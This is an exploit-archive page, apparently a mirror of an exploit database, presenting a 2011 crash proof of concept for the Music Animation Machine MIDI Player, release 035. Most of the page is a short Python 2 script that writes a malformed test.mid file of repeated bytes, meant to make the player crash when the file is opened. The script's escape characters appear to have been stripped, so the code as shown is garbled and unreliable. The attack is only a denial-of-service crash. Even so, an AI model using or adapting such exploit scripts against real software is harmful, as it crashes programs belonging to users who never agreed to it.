Music Animation Machine MIDI Player Local Crash PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Music Animation Machine MIDI Player Local Crash PoC
# Published : 2011-01-03
# Author : c0d3R'Z
# Previous Title : Wireshark ENTTEC DMX Data RLE Buffer Overflow Vulnerability
# Next Title : MS10-073 Windows Class Handling Vulnerability

# Exploit Title: Music Animation Machine MIDI Player Local Crash PoC
# Date: 1/3/2011
# Author: c0d3R'Z
# Software Link: http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
# Version: Release 035
# Tested on: Windows XP SP2 EN (VirtualBox)

 
# The application crashes when trys to convert a malformed midi file
 
#!/usr/bin/python
 
buffer     = "x31x33x33x37" * 1337
 
try:
    f = open("test.mid",'w')
    f.write(buffer)
    f.close()
 
    print " Vulnerable file created!..."
    print " Open the mid file with the application and Voila!! , it crashes!!n"
except:
    print "[-] Error occured!"